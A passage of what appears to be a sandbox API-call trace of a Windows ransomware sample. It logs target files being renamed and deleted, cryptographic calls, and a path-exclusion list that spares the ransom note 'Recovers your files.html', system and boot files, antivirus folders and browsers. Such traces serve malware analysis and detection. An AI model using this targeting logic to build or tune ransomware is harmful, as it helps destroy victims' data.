shared\\ink\\ipsrus.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.811] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB454.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb454.tmp")) returned 0xb454 [0147.812] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB454.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb454.tmp"), dwFlags=0x1) returned 0 [0147.812] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB454.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb454.tmp")) returned 1 [0147.813] CryptDestroyKey (hKey=0x9ad438) returned 1 [0147.813] wcslen (_String="OK") returned 0x2 [0147.813] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.813] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.813] CryptDestroyKey (hKey=0x9ad738) returned 1 [0147.813] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0147.813] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0147.813] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*NMCRYPT") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*Recovers your files.html") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*.exe") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*.dll") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*.lnk") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*.bat") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*.ini") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*.msi") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*.scf") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*pagefile.sys*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*AppData*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*\\winrar\\*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*\\java\\*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*\\windows\\*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*\\ESET\\*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*\\AVG\\*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*Atheros*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*Realtek*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*bootmgr*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*boot*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*boot*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*IO.SYS*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*ntldr*") returned 0 [0147.813] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*chrome*") returned 0 [0147.814] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*opera*") returned 0 [0147.814] PathMatchSpecW (pszFile="ipssrb.xml", pszSpec="*firefox*") returned 0 [0147.814] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml", pszSpec="*") returned 1 [0147.814] strlen (_Str="NMoreira") returned 0x8 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.814] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.815] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.816] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom 